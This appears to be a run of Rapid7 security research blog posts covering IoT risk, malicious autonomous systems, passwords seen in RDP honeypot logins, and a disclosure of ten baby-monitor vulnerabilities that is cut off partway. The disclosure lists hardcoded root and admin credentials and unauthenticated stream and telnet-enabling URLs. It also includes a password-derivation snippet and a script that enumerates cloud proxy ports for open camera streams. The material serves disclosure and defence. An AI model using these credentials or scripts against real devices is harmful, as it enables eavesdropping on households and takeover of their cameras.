Recently I transitioned from a Principal Consultant role into a new role at Rapid7, as Research Lead with a focus on IoT technology, and it has been a fascinating challenge. Although I have been conducting research for a number of years, covering everything from format string and buffer overflow research on Windows applications to exploring embedded appliances and hacking multifunction printers (MFPs), conducting research within the IoT world is truly exciting and amazing, and has taught me to be even more open-minded.

 

That is, open-minded to the fact that there are people out there attaching technology to everything and anything. (Even toothbrushes.)

 

[Image: a Bluetooth-connected Oral-B toothbrush]

 

As a security consultant, over the last eight years I have focused most of my research on operational style attacks, which I have developed and used to compromise systems and data during penetration testing. The concept behind operational attacks is using the operational features of a device against itself.

 

As an example, if you know how to ask nicely, MFPs will often give up Active Directory credentials, or as recent research has disclosed, network management systems openly consume SNMP data without questioning its content or where it came from.

 

IoT research is even cooler because now I get the chance to expand my experience into a number of new avenues. Historically I have prided myself on my ability to define risk around my research and communicate it well. With IoT, I initially shuddered at the question: “How do I define risk?”

 

IoT Risk

In the past, it has been fairly simple to define and explain risk as it relates to operational style attacks within an enterprise environment, but with IoT technology I initially struggled with the concept of risk. This was mainly driven by the fact that most IoT technologies appear to be consumer-grade products. So if someone hacks my toothbrush they may learn how often I brush my teeth. What is the risk there, and how do I measure that risk?

 

The truth is, the deeper I head down this rabbit hole called IoT, the better my understanding of risk grows. A prime example of defining such risk was pointed out by Tod Beardsley in his blog “The Business Impact of Hacked Baby Monitors”. At first look, we might easily jump to the conclusion that there may not be any serious risk to an enterprise business. But on second take, if a malicious actor can use some innocuous IoT technology to gain a foothold in the home network of one of your employees, they could then potentially pivot onto the corporate network via remote access, such as a VPN. This is a valid risk that can be communicated and should be seriously considered.

 

IoT Research

To better define risk, we need to ensure our research involves all aspects of IoT technology. Often when researching and testing IoT, researchers can get a form of tunnel vision where they focus on the technology from a single point of reference - for example, the device itself.

 

While working and discussing IoT technology with my peers at Rapid7, I have grown to appreciate the complexity of IoT and its ecosystem. Yes, ecosystem—this is where we consider the entire security picture of IoT, and not just one facet of the technology. This includes the following three categories, and how each of them interacts with and impacts the others. We cannot test one without the others and consider that testing effective. We must test each one, and also test how they affect each other.

 

[Figure: the three categories of the IoT ecosystem]

 

With IoT quickly becoming more than just consumer-grade products, we are starting to see more IoT-based technologies migrating into the enterprise environment. If we are ever going to build a secure IoT world, it is critical during our research that all aspects of the ecosystem are addressed.

 

The knowledge we learn from this research can help enterprises better cope with the new security risks, make better decisions on technology purchases, and help employees stay safe within their home environment—which leads to better security for our enterprises. Thorough research can also deliver valuable knowledge back to the vendors, making it possible to improve product security during the design, creation, and manufacturing of IoT technology, so new vendors and new products are not recreating the same issues over and over.

 

So, as we continue down the road of IoT research, let us focus our efforts on the entire ecosystem. That way we can ensure that our efforts lead to a complete picture and culminate in security improvements within the IoT industry.

by Suchin Gururangan & Bob Rudis

 

At Rapid7, we are committed to engaging in research to help defenders understand, detect and defeat attackers. We conduct internet-scale research to gain insight into the volatile threat landscape and share data with the community via initiatives like Project Sonar [1] and Heisenberg [2]. As we crunch this data, we have a better idea of the global exposure to common vulnerabilities and can see emerging patterns in offensive attacks.

 

We also use this data to add intelligence to our products and services. We’re developing machine learning models that use this daily internet telemetry to identify phishing sites and to find and classify devices through their certificate and site configurations.

 

We have recently focused our research on how these tools can work together to provide unique insight on the state of the internet. Looking at the internet as a whole can help researchers identify stable, macro-level trends in the individual attacks between IP addresses. In this post, we’ll give you a window into these explorations.

 

IPv4 Topology

First, a quick primer on IPv4, the fourth version of the Internet Protocol. The topology of IPv4 is characterized by three levels of hierarchy, from smallest to largest: IP addresses, subnets, and autonomous systems (ASes). IP addresses on IPv4 are 32-bit sequences that identify hosts or network interfaces. Subnets are groups of IP addresses, and ASes are blocks of subnets managed by public institutions and private enterprises. IPv4 is divided into about 65,000 ASes, at least 30M subnets, and 2^32 (roughly 4.3 billion) IP addresses.
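The three levels nest cleanly, which makes them easy to model. A small illustration using Python's ipaddress module, with a documentation-range ASN and example prefixes rather than any real allocation:

```python
# Model an AS as a set of subnets; IPs nest in subnets, subnets in ASes.
import ipaddress

as_example = {
    "asn": 64496,  # ASN from the documentation range, not a real network
    "subnets": [
        ipaddress.ip_network("192.0.2.0/24"),
        ipaddress.ip_network("198.51.100.0/25"),
    ],
}

host = ipaddress.ip_address("192.0.2.42")
print(any(host in net for net in as_example["subnets"]))        # True
print(sum(net.num_addresses for net in as_example["subnets"]))  # 384
```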

 

Malicious ASes

There has been a great deal of academic and industry focus on identifying malicious activity in and across autonomous systems [3,4,5,6], and for good reasons. Well over 50% of “good” internet traffic comes from a small subset of large, well-defined, ocean-like ASes pushing content from Netflix, Google, Facebook, Apple, and Amazon. Despite this centralization of “cloud” content, we’ll show that the internet has become substantially more fragmented over time, enabling those with malicious intent to stake their claim in less friendly waters. In fact, our longitudinal data on phishing activity across IPv4 presented an interesting trend: a small subset of autonomous systems have regularly hosted a disproportionate amount of malicious activity. In particular, 200 ASes hosted 70% of phishing activity from 2007 to 2015 (data: cleanmx archives [7]). We wanted to understand what makes some autonomous systems more likely to host malicious activity.
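Measuring that concentration is a matter of sorting per-AS counts and taking a cumulative share. A minimal sketch, with the input format assumed (the real analysis was built on the cleanmx archives):

```python
# What fraction of phishing activity do the busiest N ASes account for?
def share_of_top(as_counts: dict, n: int = 200) -> float:
    """as_counts maps ASN -> number of phishing observations."""
    total = sum(as_counts.values())
    top = sorted(as_counts.values(), reverse=True)[:n]
    return sum(top) / total

# For the 2007-2015 data, share_of_top(counts, 200) comes out near 0.70.
```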

 

[Figure: density of phishing activity across ASes]

[Figure: top 20 ASes by phishing activity]

 

IPv4 Fragmentation

We gathered historical data on the mapping between IP addresses and ASes from 2007 to 2015 to generate a longitudinal map of IPv4. This map clearly suggested IPv4 has been fragmenting. In fact, the total number of ASes has grown 60% in the past decade. During the same period, there has been a rise in the number of small ASes and a decline in the number of large ones. These results make sense given that IPv4 address space has been exhausted. This means that growth in IPv4 access requires the reallocation of existing address space into smaller and smaller independent blocks.

 

[Figure: growth in the number of ASes and the shift toward smaller ASes, 2007-2015]

 

 

AS Fragmentation

Digging deeper into the Internet hierarchy, we analyzed the composition, size, and fragmentation of malicious ASes.

ARIN, one of the primary regional internet registries, categorizes subnets based on the number of IP addresses they contain. We found that the smallest subnets available made up on average 56±3.0 percent of a malicious AS.

We inferred the size of an AS by calculating its maximum amount of addressable space. Malicious ASes were in the 80-90th percentile in size across IPv4.

 

To compute fragmentation, subnets observed in ASes over time were organized into trees based on parent-child relationships (Figure 3). We then calculated the ratio of the number of root subnets, which have no parents, to the number of subsequent child subnets across the lifetime of the AS. We found that malicious ASes were 10-20% more fragmented than other ASes in IPv4.
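Our reading of that metric can be sketched as follows: a subnet is a child if some other subnet observed in the same AS strictly contains it, and the ratio compares roots to children. This is an illustrative reconstruction, not the analysis code we ran:

```python
# Fragmentation of an AS: ratio of root subnets to child subnets.
import ipaddress

def fragmentation(subnet_strs):
    nets = [ipaddress.ip_network(s) for s in subnet_strs]
    # A root is contained by no other observed subnet.
    roots = [a for a in nets
             if not any(a != b and a.subnet_of(b) for b in nets)]
    children = len(nets) - len(roots)
    return len(roots) / children if children else 0.0

# One /16 root with two /24 children -> ratio 0.5
print(fragmentation(["10.0.0.0/16", "10.0.1.0/24", "10.0.2.0/24"]))
```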

 

[Figure 3: parent-child subnet trees used to compute AS fragmentation]

 

These results suggest that malicious ASes are large and deeply fragmented into small subnets. ARIN fee schedules [8] show that smaller subnets are significantly less expensive to purchase, and the inexpensive nature of small subnets may allow malicious registrants to purchase many IP blocks for traffic redirection or to host proxy servers to better float under the radar.

 

 

Future Work

Further work is required to characterize the exact cost structure of buying subnets, registering IP blocks, and setting up infrastructure in malicious ASes.

 

We'd also like to understand the network and system characteristics that cause attackers to choose to co-opt a specific autonomous system over another. For example, we used Sonar’s historical forward DNS service and our phishing detection algorithms to characterize all domains that have mapped to these ASes in the past two years. Domains hosted in malicious ASes had features that suggested deliberate use of specific infrastructure. For example, 'wordpress' sites were over-represented in some malicious ASes (like AS4808), and GoDaddy was by far the most popular registrar for malicious sites across the board.

 

We can also use our SSL Certificate classifier to understand the distribution of devices hosted in ASes across IPv4, as seen in the chart below:

 

[Figure: probability distributions of device counts per AS, by device type]

 

Each square above shows the probability distribution (a fancier, prettier histogram) of device counts of a particular type. Most ASes host fewer than 100 devices across a majority of categories. Are there skews in the presence of specific devices used to propagate phishing attacks from these malicious ASes?

 

Conclusion

Our research presents the following results:

 

  1. A small subset of ASes continue to host a disproportionate amount of malicious activity.

  2. Smaller subnets and ASes are becoming more ubiquitous in IPv4.

  3. Malicious ASes are deeply fragmented.

  4. There is a concentrated use of specific infrastructure in malicious ASes.

  5. Attackers both co-opt existing devices and stand up their own infrastructure within ASes (a gut-check would suggest this is obvious, but having data to back it up also makes it science).

 

Further work is required to characterize the exact cost structure of buying subnets, registering IP blocks, and setting up infrastructure in malicious ASes along with what network and system characteristics cause attackers to choose to co-opt one device in one autonomous system over another.

 

This research represents an example of how Internet-scale data science can provide valuable insight on the threat landscape. We hope similar macro level research is inspired by these explorations and will be bringing you more insights from Project Sonar & Heisenberg over the coming year.


  1. Sonar intro

  2. Heisenberg intro

  3. G. C. M. Moura, R. Sadre, and A. Pras, "Internet Bad Neighborhoods: The spam case," Network and Service Management (CNSM), 2011 7th International Conference on, Paris, 2011, pp. 1-8.

  4. B. Stone-Gross, C. Kruegel, K. Almeroth, A. Moser, and E. Kirda, "FIRE: FInding Rogue nEtworks," doi: 10.1109/ACSAC.2009.29

  5. C. A. Shue, A. J. Kalafut, and M. Gupta, "Abnormally Malicious Autonomous Systems and Their Internet Connectivity," doi: 10.1109/TNET.2011.2157699

  6. A. J. Kalafut, C. A. Shue, and M. Gupta, "Malicious Hubs: Detecting Abnormally Malicious Autonomous Systems," doi: 10.1109/INFCOM.2010.5462220

  7. Cleanmx archive

  8. ARIN Fee Schedule

The Attacker's Dictionary

Posted by royhodgman, Mar 1, 2016

Rapid7 is publishing a report about the passwords attackers use when they scan the internet indiscriminately. You can pick up a copy at booth #4215 at the RSA Conference this week, or online right here. The following post describes some of what is investigated in the report.

 

Announcing the Attacker's Dictionary

Rapid7's Project Sonar periodically scans the internet across a variety of ports and protocols, allowing us to study the global exposure to common vulnerabilities as well as trends in software deployment (this analysis of binary executables stems from Project Sonar).

 

As a complement to Project Sonar, we run another project called Heisenberg which listens for scanning activity. Whereas Project Sonar sends out lots of packets to discover what is running on devices connected to the Internet, Project Heisenberg listens for and records the packets being sent by Project Sonar and other Internet-wide scanning projects.

 

The datasets collected by Project Heisenberg let us study what other people are trying to examine or exploit. Of particular interest are scanning projects which attempt to use credentials to log into services that we do not provide. We cannot say for sure what a device intends when it attempts to log into a nonexistent RDP server running on an IP address which has never advertised its presence, but we believe that behavior is suspect and worth analyzing.

 

How Project Heisenberg Works

Project Heisenberg is a collection of low interaction honeypots deployed around the world. The honeypots run on IP addresses which we have not published, and we expect that the only traffic directed to the honeypots would come from projects or services scanning a wide range of IP addresses. When an unsolicited connection attempt is made to one of our honeypots, we store all the data sent to the honeypot in a central location for further analysis.

 

In this post we will explore some of the data we have collected related to Remote Desktop Protocol (RDP) login attempts.

 

RDP Summary Data

We have collected RDP passwords over a 334-day period, from 2015-03-12 to 2016-02-09.

 

During that time we have recorded 221,203 different attempts to log in, coming from 5,076 distinct IP addresses across 119 different countries, using 1,806 different usernames and 3,969 different passwords.

 

Because it wouldn't be a discussion of passwords without a top 10 list, the top 10 passwords that we collected are:

 

password        count   percent
x               11865   5.36%
Zz              10591   4.79%
St@rt123         8014   3.62%
1                5679   2.57%
P@ssw0rd         5630   2.55%
bl4ck4ndwhite    5128   2.32%
admin            4810   2.17%
alex             4032   1.82%
.......          2672   1.21%
administrator    2243   1.01%

 

And because we have information not only about passwords, but also about the usernames that are being used, here are the top 10 that were collected:

 

username        count   percent
administrator   77125   34.87%
Administrator   53427   24.15%
user1            8575    3.88%
admin            4935    2.23%
alex             4051    1.83%
pos              2321    1.05%
demo             1920    0.87%
db2admin         1654    0.75%
Admin            1378    0.62%
sql              1354    0.61%

 

We see on average 662.28 login attempts every day, but the actual daily number varies quite a bit. The chart below shows the number of events per day since we started collecting data. Notice the heavy activity in the first four months, which skews the average high.

 

[ Figure: login attempts per day over the collection period ]

 

In addition to the username and password used in each login attempt that we captured, we also collected the IP address of the device making the attempt and mapped it to a country of origin.
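That attribution step looks roughly like the following sketch using MaxMind's geoip2 library; the post does not say which GeoIP database was used, so the database filename here is an assumption.

```python
# Map a source IP to a country with a GeoLite2 database (path assumed).
import geoip2.database

reader = geoip2.database.Reader("GeoLite2-Country.mmdb")
response = reader.country("128.101.101.101")
print(response.country.iso_code, response.country.name)
reader.close()
```

To the best of the ability of the GeoIP database we used, here are the top 10 countries from which the collected login attempts originate: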

 

country          country code   count   percent
China            CN             88227   39.89%
United States    US             54977   24.85%
South Korea      KR             13182    5.96%
Netherlands      NL             10808    4.89%
Vietnam          VN              6565    2.97%
United Kingdom   GB              3983    1.80%
Taiwan           TW              3808    1.72%
France           FR              3709    1.68%
Germany          DE              2488    1.12%
Canada           CA              2349    1.06%

 

With the data broken down by country, we can recreate the chart above to show activity by country for the top 5 countries:

 

 

[ Figure: login attempts per day for the top 5 countries ]

 

RDP Highlights

There is even more information to be found in this data beyond counting passwords, usernames and countries.

We guess that these passwords are selected because whoever is conducting these scans believes that there is a chance they will work. Maybe the scanners have inside knowledge about actual usernames and passwords in use, or maybe they're just using passwords that have been made available from previous security breaches in which account credentials were leaked.

 

In order to look into this, we compared all the passwords collected by Project Heisenberg to passwords listed in two different collections of leaked passwords. The first is a list of passwords collected from leaked password databases by Crackstation. The second list comes from Mark Burnett.
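Mechanically, the comparison is simple set membership. Here is a sketch with a stand-in "leaked" set (not the real Crackstation or Burnett corpora) chosen so this toy example mirrors the first rows of the table below:

```python
# Count how many of the top N collected passwords appear in any leaked
# list. The `leaked` set is illustrative, not the actual corpora.
leaked = {"x", "Zz", "1", "P@ssw0rd", "bl4ck4ndwhite",
          "admin", "alex", "administrator"}
top_collected = ["x", "Zz", "St@rt123", "1", "P@ssw0rd",
                 "bl4ck4ndwhite", "admin", "alex", ".......",
                 "administrator"]

for n in (1, 2, 3, 4, 5, 10):
    hits = sum(1 for pw in top_collected[:n] if pw in leaked)
    print(f"top {n}: {hits} found ({100 * hits / n:.2f}%)")
```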

 

In the table below we list how many of the top N passwords are found in these password lists:

 

top password count   num in any list   percent
1                                  1   100.00%
2                                  2   100.00%
3                                  2    66.67%
4                                  3    75.00%
5                                  4    80.00%
10                                 8    80.00%
50                                28    56.00%
100                               55    55.00%
1000                             430    43.00%
3969                            1782    44.90%

 

This means that 8 of the 10 most frequently used passwords were also found in published lists of leaked passwords. But looking back at the top 10 passwords above, they are not very complex and so it is not surprising that they appear in a list of leaked passwords.

 

This observation prompted us to look at the complexity of the passwords we collected. Just about any time you sign up for a service on the internet – be it a social networking site, an online bank, or a music streaming service – you will be asked to provide a username and password. Many times your chosen password will be evaluated during the signup process and you will be given feedback about how suitable or secure it is.

 

 

Password evaluation is a tricky and inexact art that consists of various components. Some of the many aspects that a password evaluator may take into consideration include:

 

  • length
  • presence of dictionary words
  • runs of characters (aaabbbcddddd)
  • presence of non alphanumeric characters (!@#$%^&*)
  • common substitutions (1 for l [lowercase L], 0 for O [uppercase o])

 

Different password evaluators will place different values on each of these (and other) characteristics to decide whether a password is "good" or "strong" or "secure". We looked at a few of these password evaluators, and found zxcvbn to be well documented and maintained, so we ran all the passwords through it to compute a complexity score for each one. We then looked at how password complexity is related to finding a password in a list of leaked passwords.
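As a concrete sketch of that scoring step, here is what it looks like assuming the Python port of zxcvbn (the analysis itself may have used the JavaScript implementation directly):

```python
# Score passwords with zxcvbn (`pip install zxcvbn`); sample passwords
# are taken from the top-10 table above.
from zxcvbn import zxcvbn

for pw in ("x", "Zz", "St@rt123", "P@ssw0rd", "bl4ck4ndwhite"):
    result = zxcvbn(pw)
    # 'score' runs from 0 (trivially guessable) to 4 (very strong).
    print(f"{pw!r}: complexity {result['score']}")
```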

 

complexity   # passwords   %       crackstation   crackstation %   Burnett   Burnett %   any   any %   all   all %
0                    803   20.23            726            90.41       564       70.24    728   90.66   562   69.99
1                   1512   38.10            898            59.39       634       41.93    939   62.10   593   39.22
2                    735   18.52             87            11.84        37        5.03     94   12.79    30    4.08
3                    567   14.29             13             2.29         5        0.88     13    2.29     5    0.88
4                    352    8.87              7             1.99         4        1.14      8    2.27     3    0.85

 

The above table shows the complexity of the collected passwords, as well as how many were found in different password lists.

 

For instance, with complexity level 4, there were 352 passwords classified as being that complex, 7 of which were found in the crackstation list, and 4 of which were found in the Burnett list. Furthermore, 8 of the passwords were found in at least one of the password lists, meaning that if you had all the password lists, you would find 2.27% of the passwords classified as having a complexity value of 4. Similarly, looking across all the password lists, you would find 3 (0.85%) passwords present in each of the lists.

 

From this we extrapolate that as passwords get more complex, fewer and fewer are found in the lists of leaked passwords. Since we see that attackers try passwords that are stupendously simple, like single character passwords, and much more complex passwords that are typically not found in the usual password lists, we can surmise that these attackers are not tied to these lists in any practical way -- they clearly have other sources for likely credentials to try.

 

Finally, we wanted to know what the population of possible targets looks like. How many endpoints on the internet have an RDP server running, waiting for connections? Drawing on our experience with Project Sonar, on 2016-02-02 the Rapid7 Labs team ran a Sonar scan to see how many IPs have port 3389 open and listening for TCP traffic. We found that 10,822,679 different IP addresses meet that criterion, spread out all over the world.
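Sonar uses purpose-built scanning tooling, but the per-host check underlying such a survey boils down to something like this sketch:

```python
# Does an endpoint accept TCP connections on the RDP port?
import socket

def rdp_port_open(host: str, port: int = 3389, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

print(rdp_port_open("192.0.2.1"))  # TEST-NET address; expect False
```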

 

So What?

With this dataset we can learn about how people looking to log into RDP servers operate. We have much more detail in the report, but some of our findings include:

  • We see that many times a day, every day, our honeypots are contacted by a variety of entities.
  • We see that many of these entities try to log into an RDP service which is not there, using a variety of credentials.
  • We see that a majority of the login attempts use simple passwords, most of which are present in collections of leaked passwords.
  • We see that as passwords get more complex, they are less and less likely to be present in collections of leaked passwords.
  • We see that there is a significant population of RDP enabled endpoints connected to the internet.

 

But wait, there's more!

If this interests you and you would like to learn more, come talk to us at booth #4215 at the RSA Conference.

By now, you’ve probably caught wind of Mark Stanislav’s ten newly disclosed vulnerabilities last week, or seen our whitepaper on baby monitor security – if not, head on over to the IoTSec resources page.

 

You may also have noticed that Rapid7 isn’t really a Consumer Reports-style testing house for consumer gear. We’re much more of an enterprise security services and products company, so what’s the deal with the baby monitors? Why spend time and effort on this?

 

The Decline of Human Dominance

Well, this whole “Internet of Things” is in the midst of really taking off, which I’m sure doesn’t come as news. According to Gartner, we’re on track to see 25 billion-with-a-B of these Things operating in just five years, or something around three to four Things for every human on Earth.

 

Pretty much every electronic appliance in your home is getting a network stack, an operating system kernel, and a cloud-backed service, and it’s not like they have their own network full of routers and endpoints and frequencies to do all this on. They’re using the home’s WiFi network, hopping out to the Internet, and talking to you via your most convenient screen.

 

Pwned From Home

In the meantime, telecommuting increasingly blurs the lines between the “work” network and the “home” network. From my home WiFi, I check my work e-mail, hop on video conferences, commit code to GitHub (both public and private), and interact with Rapid7’s assets directly or via a cloud service pretty much every day. I know I’m not alone on this. The imaginary line between the “internal” corporate network and the “external” network has been a convenient fiction for a while, and it’s getting more and more porous as traversing that boundary makes more and more business sense. After all, I’m crazy productive when I’m not in the office, thanks largely to my trusty 2FA, SSO, and VPN.

 

So, we’re looking at a situation where you have a network full of Things that haven’t been IT-approved (as if that stopped anyone before) all chattering away, while we’re trying to do sensitive stuff like access and write sensitive and proprietary company data, on the very same network.

 

Oh, and if the aftermarket testing we’ve seen (and performed) is to be believed, these devices haven’t had a whole lot of security rigor applied.

 

Compromising a network starts with knocking over that low-hanging fruit, that one device that hasn’t seen a patch in forever, that doesn’t keep logs, that has a silly password on an administrator-level account – pretty much, a device that has all of the classic misfeatures common to video baby monitors and every other early market IoT device.

 

Let’s Get Hacking

Independent research is critical in getting the point across that this IoT revolution is not just nifty and useful. It needs to be handled with care. Otherwise, the IoT space will represent a mountain of shells, pre-built vulnerable platforms, usable by bad guys to get footholds in every home and office network on Earth.

 

If you’re responsible for IT security, maybe it’s time to take a survey of your user base and see if you can get a feel for how many IoT devices are one hop away from your critical assets. Perhaps you can start an education program on password management that goes beyond the local Active Directory, and gets people to take all these passwords seriously. Heck, teach your users how to check and change defaults on their new gadgets, and how to document their changes for when things go south.

 

In the meantime, check out our webinar tomorrow for the technical details of Mark’s research on video baby monitors, and join us over on Reddit and “Ask Me Anything” about IoT security and what we can do to get ahead of these problems.

Usually, these disclosure notices contain one, maybe two vulnerabilities on one product. Not so for this one; we’ve got ten new vulnerabilities to disclose today.

 

If you were out at DEF CON 23, you may have caught Mark Stanislav’s workshop, “The Hand that Rocks the Cradle: Hacking IoT Baby Monitors.” You may have also noticed some light redaction in the slides, since during the course of that research, Mark uncovered a number of new vulnerabilities across several video baby monitors.

 

Vendors were notified, CERT/CC was contacted, and CVEs have all been assigned, per the usual disclosure policy, which brings us to the public disclosure piece, here.

 

For more background and details on the IoT research we've performed here at Rapid7, we've put together a collection of resources on this IoT security research. There, you can find the whitepaper covering many more aspects of IoT security, some frequently asked questions around the research, and a registration link for next week's live webinar with Mark Stanislav and Tod Beardsley.

 

Summary

 

CVE             Access Vector       R7 ID          Vulnerability Class            Device
CVE-2015-2886   Remote              R7-2015-11.1   Predictable Information Leak   iBaby M6
CVE-2015-2887   Local Net, Device   R7-2015-11.2   Backdoor Credentials           iBaby M3S
CVE-2015-2882   Local Net, Device   R7-2015-12.1   Backdoor Credentials           Philips In.Sight B120/37
CVE-2015-2883   Remote              R7-2015-12.2   Reflective, Stored XSS         Philips In.Sight B120/37
CVE-2015-2884   Remote              R7-2015-12.3   Direct Browsing                Philips In.Sight B120/37
CVE-2015-2888   Remote              R7-2015-13.1   Authentication Bypass          Summer Baby Zoom Wifi Monitor & Internet Viewing System
CVE-2015-2889   Remote              R7-2015-13.2   Privilege Escalation           Summer Baby Zoom Wifi Monitor & Internet Viewing System
CVE-2015-2885   Local Net, Device   R7-2015-14     Backdoor Credentials           Lens Peek-a-View
CVE-2015-2881   Local Net           R7-2015-15     Backdoor Credentials           Gynoii
CVE-2015-2880   Device              R7-2015-16     Backdoor Credentials           TRENDnet WiFi Baby Cam TV-IP743SIC

 

 

Disclosure Details

 

Vendor: iBaby Labs, Inc.

The issues for the iBaby devices were disclosed to CERT under vulnerability note VU#745448.

 

Device: iBaby M6

The vendor's product site for the device assessed is https://ibabylabs.com/ibaby-monitor-m6


Vulnerability R7-2015-11.1: Predictable public information leak (CVE-2015-2886)

The web site ibabycloud.com suffers from a direct object reference vulnerability: any authenticated user of the ibabycloud.com service is able to view camera details for any other user, including video recording details.

 

The object ID parameter is eight hexadecimal characters, corresponding with the serial number for the device. This small object ID space enables a trivial enumeration attack, where attackers can quickly brute force the object IDs of all cameras.

 

Once an attacker is able to view an account's details, broken links reveal the filenames of the "alert" videos the camera has recorded. By appending a harvested filename to a generic AWS CloudFront endpoint (found by sniffing the iOS app's traffic), the attacker can retrieve the video data for that account. This effectively allows anyone to view videos created by that camera and stored on the ibabycloud.com service, until those videos are deleted, without any further authentication.

 

Relevant URLs

 

Additional Details

The ibabycloud.com authentication procedure has been non-functional since at least June 2015, continuing through the publication of this report in September 2015. These errors began after testing for this research was completed, and they currently prevent logins to the cloud service. That noted, it may still be possible to obtain a valid session via the API and subsequently leverage the site and API to gain these details.

 

Mitigations

Today, this attack is more difficult without prior knowledge of the camera's serial number, as all logins are disabled on the ibabycloud.com website. Attackers must, therefore, acquire specific object IDs by other means, such as sniffing local network traffic.

 

In order to avoid local network traffic cleartext exposure, customers should inquire with the vendor about a firmware update, or cease using the device.

 

 

Device: iBaby M3S

The vendor's product site for the device assessed is https://ibabylabs.com/ibaby-monitor-m3s

 

Vulnerability R7-2015-11.2, Backdoor Credentials (CVE-2015-2887)

The device ships with hardcoded credentials, accessible from a telnet login prompt and a UART interface, which grants access to the underlying operating system. Those credentials are detailed below.

 

Operating System (via Telnet or UART)

  • Username: admin
  • Password: admin

 

Mitigations

In order to disable these credentials, customers should inquire with the vendor about a firmware update. UART access can be limited by not allowing untrusted parties physical access to the device. A vendor-provided patch should disable local administrative logins, and in the meantime, end-users should secure the device’s housing with tamper-evident labels.

 

Disclosure Timeline

Sat, Jul 04, 2015: Initial contact to vendor

Mon, Jul 06, 2015: Vendor reply, requesting details for ticket #4085

Tue, Jul 07, 2015: Disclosure to vendor

Tue, Jul 21, 2015: Disclosure to CERT

Fri, Jul 24, 2015: Confirmed receipt by CERT

Wed, Sep 02, 2015: Public disclosure

 

 

Vendor: Philips Electronics N.V.

The issue for the Philips device was disclosed to CERT under vulnerability note VU#569536.

 

Device: Philips In.Sight B120/37

The vendor's product site for the device assessed is http://www.usa.philips.com/c-p/B120_37/in.sight-wireless-hd-baby-monitor

 

Vulnerability R7-2015-12.1, Backdoor Credentials (CVE-2015-2882)

The device ships with hardcoded and statically generated credentials which can grant access to both the local web server and operating system.

The operating system "admin" and "mg3500" account passwords are present due to the stock firmware used by this camera, which is also used by other cameras on the market today.

The web service "admin" statically-generated password was first documented by Paul Price at his blog[1].

In addition, while the telnet service may be disabled by default on the most recent firmware, it can be re-enabled via an issue detailed below.

 

Operating System (via Telnet or UART)

  • Username: root
  • Password: b120root

 

Operating System (via Telnet or UART)

  • Username: admin
  • Password: /ADMIN/

 

Operating System (via Telnet or UART)

  • Username: mg3500
  • Password: merlin

 

Local Web Server

Reachable via http://{device_ip}/cgi-bin/{script_path}

  • Username: user
  • Password: M100-4674448

 

Local Web Server

Reachable via http://{device_ip}/cgi-bin/{script_path}

  • Username: admin
  • Password: M100-4674448
  • A recent update changes this password, but the new password is simply the letter 'i' prefixing the first ten characters of the MD5 hash of the device's MAC address (see the sketch below).
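Assuming the firmware hashes the raw MAC string (its exact formatting, case and separators, is not specified here), deriving that updated password looks roughly like this:

```python
# 'i' + first ten hex characters of MD5(MAC). The MAC string format
# fed to the hash is an assumption for illustration.
import hashlib

def derive_web_admin_password(mac: str) -> str:
    return "i" + hashlib.md5(mac.encode("ascii")).hexdigest()[:10]

print(derive_web_admin_password("00:11:22:33:44:55"))
```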

 

Vulnerability R7-2015-12.2, Reflective and Stored XSS (CVE-2015-2883)

A web service used on the backend of Philips' cloud service to create remote streaming sessions is vulnerable to reflective and stored XSS. Subsequently, session hijacking is possible due to a lack of an HttpOnly flag.

When accessing the Weaved cloud web service[2] as an authenticated user, multiple pages have a mixture of reflective and stored XSS in them, allowing for potential session hijacking. With this access, a valid streaming session could be generated and eavesdropped upon by an attacker. Two such examples are:

 

Vulnerability R7-2015-12.3, Direct Browsing via Insecure Streaming (CVE-2015-2884)

The method for allowing remote viewing uses an insecure transport, does not offer secure streams protected from attackers, and does not offer sufficient protection for the camera's internal web applications.

Once a remote viewing stream has been requested, a proxy connection to the camera's internal web service via the cloud provider Yoics[3] is bound to a public hostname and port number. These port numbers appear to range from 32,000 to 39,000, as determined from testing. The bound port is tied to a hostname matching the pattern proxy[1,3-14].yoics.net, limiting the number of possible host and port combinations to an enumerable level. Given this manageable attack space, attackers can test for an HTTP 200 response in a reasonably short amount of time.

 

Once found, administrative privilege is available without authentication of any kind to the web scripts available on the device. Further, by accessing a Unicode-enabled streaming URL (known as an "m3u8" URL), a live video/audio stream from the camera will be accessible and appears to stay open for up to 1 hour on that host/port combination. Testing revealed no blacklist or whitelist restriction on which IP addresses can access these URLs.

 

Relevant URLs

  • Open audio/video stream of a camera: http://proxy{1,3-14}.yoics.net:{32000-39000}/tmp/stream2/stream.m3u8 [no authentication required]
  • Enable Telnet service on camera remotely: http://proxy{1,3-14}.yoics.net:{32000-39000}/cgi-bin/cam_service_enable.cgi [no authentication required]
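To illustrate how enumerable that space is, a brute-force sweep over the host pattern and port range documented above might look like the following sketch (for illustration only):

```python
# Walk proxy[1,3-14].yoics.net across ports 32000-39000, flagging any
# endpoint that answers the stream URL with HTTP 200.
import requests

HOSTS = [f"proxy{n}.yoics.net" for n in [1, *range(3, 15)]]

def find_open_streams():
    for host in HOSTS:
        for port in range(32000, 39001):
            url = f"http://{host}:{port}/tmp/stream2/stream.m3u8"
            try:
                if requests.get(url, timeout=1).status_code == 200:
                    print("open stream:", url)
            except requests.RequestException:
                pass  # closed port or unreachable host

find_open_streams()
```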

 

Mitigations

In order to disable the hard-coded credentials, customers should inquire with the vendor about a firmware update. UART access can be limited by not allowing untrusted parties physical access to the device. A vendor-provided patch should disable local administrative logins, and in the meantime, end-users should secure the device’s housing with tamper-evident labels. In order to avoid the XSS and cleartext streaming issues with Philips' cloud service, customers should avoid using the remote streaming functionality of the device and inquire with the vendor about the status of a cloud service update.

 

Additional Information

Prior to publication of this report, Philips confirmed with Rapid7 that the tested device was discontinued by Philips in 2013, and that the current manufacturer and distributor is Gibson Innovations. Gibson has developed a solution for the identified vulnerabilities, and expects to make updates available by September 4, 2015.

 

Disclosure Timeline

Sat, Jul 04, 2015: Initial contact to vendor

Mon, Jul 06, 2015: Vendor reply, requesting details

Tue, Jul 07, 2015: Philips Responsible Disclosure ticket number 15191319 assigned

Tue, Jul 17, 2015: Phone conference with vendor to discuss issues

Tue, Jul 21, 2015: Disclosure to CERT

Fri, Jul 24, 2015: Confirmed receipt by CERT

Thu, Aug 27, 2015: Contacted by Weaved to validate R7-2015-12.2

Tue, Sep 01, 2015: Contacted by Philips regarding the role of Gibson Innovations

Wed, Sep 02, 2015: Public disclosure

 

 

Vendor: Summer Infant

The issues for the Summer Infant device were disclosed to CERT under vulnerability note VU#837936.

 

